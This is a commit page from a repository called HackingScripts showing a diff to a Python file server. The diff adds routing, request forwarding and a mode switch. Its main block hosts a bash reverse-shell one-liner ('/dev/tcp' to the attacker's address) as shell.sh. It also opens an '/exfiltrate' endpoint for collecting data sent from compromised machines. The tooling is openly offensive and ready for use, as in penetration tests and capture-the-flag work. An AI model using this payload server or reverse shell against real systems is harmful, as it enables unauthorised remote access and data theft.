Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

python webserver routes

Browse Source
This commit is contained in:
Roman Hergenreder 2020-10-21 21:41:06 +02:00
parent 1a4d7821f8
commit 2338077bd6
2 changed files with 60 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

86
fileserver.py
View File

@ -3,6 +3,7 @@
from hackingscripts import util
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import requests
import sys
import os
import ssl
@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.do_GET()
def onForward(self, target):
queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
if queryStr:
target += "?" if "?" not in target else "&"
target += queryStr
method = self.command
res = requests.request(method, target)
return res.content, res.status_code
def do_GET(self):
path = self.path if "?" not in self.path else self.path[0:self.path.find("?")]
if path in self.server.files:
data = self.server.files[path]
self.send_response(200)
path = self.server.cleanPath(self.path)
if path in self.server.routes:
data, code = self.server.routes[path](self)
self.send_response(code)
self.end_headers()
self.wfile.write(data)
if data:
self.wfile.write(data)
else:
self.send_response(404)
self.end_headers()
@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
if self.server.logRequests:
# BaseHTTPRequestHandler.log_message(format, *args)
super().log_message(format, *args)
class HttpFileServer(HTTPServer):
def __init__(self, addr, port):
super().__init__((addr, port), FileServerRequestHandler)
self.logRequests = False
self.routes = { }
self.dumpRequests = []
self.files = { }
def cleanPath(self, path):
if "?" in path:
path = path[0:path.find("?")]
if not path.startswith("/"):
path = "/" + path
return path.strip()
def addFile(self, name, data):
if isinstance(data, str):
data = data.encode("UTF-8")
if not name.startswith("/"):
name = "/" + name
self.files[name.strip()] = data
def addFile(self, name, data):
if isinstance(data, str):
data = data.encode("UTF-8")
if not name.startswith("/"):
name = "/" + name
self.files[name.strip()] = data
# return 200 - OK and data
self.addRoute(name, lambda req: (data, 200))
def dumpRequest(self, name):
if not name.startswith("/"):
name = "/" + name
self.dumpRequests.append(name)
self.dumpRequests.append(self.cleanPath(name))
def addRoute(self, path, func):
self.routes[self.cleanPath(path)] = func
def forwardRequest(self, path, target):
self.addRoute(path, lambda req: req.onForward(target))
def enableLogging(self):
self.logRequests = True
@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer):
t.start()
return t
# EXAMPLE
def start(self):
return self.serve_forever()
if __name__ == "__main__":
listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1])
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]:
print("Usage: %s [shell,dump,proxy]" % sys.argv[0])
exit(1)
fileServer = HttpFileServer("0.0.0.0", 80)
ipAddress = util.getAddress()
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
fileServer = HttpFileServer("0.0.0.0", 80)
fileServer.addFile("shell.sh", rev_shell)
fileServer.startBackground()
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
if sys.argv[1] == "shell":
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
fileServer.addFile("shell.sh", rev_shell)
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
elif sys.argv[1] == "dump":
fileServer.dumpRequest("/exfiltrate")
print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress)
elif sys.argv[1] == "proxy":
fileServer.forwardRequest("/proxy", "https://google.com")
print("Exfiltrate data using: http://%s/proxy" % ipAddress)
fileServer.start()

0
linux-exploit-suggester.sh Normal file → Executable file
View File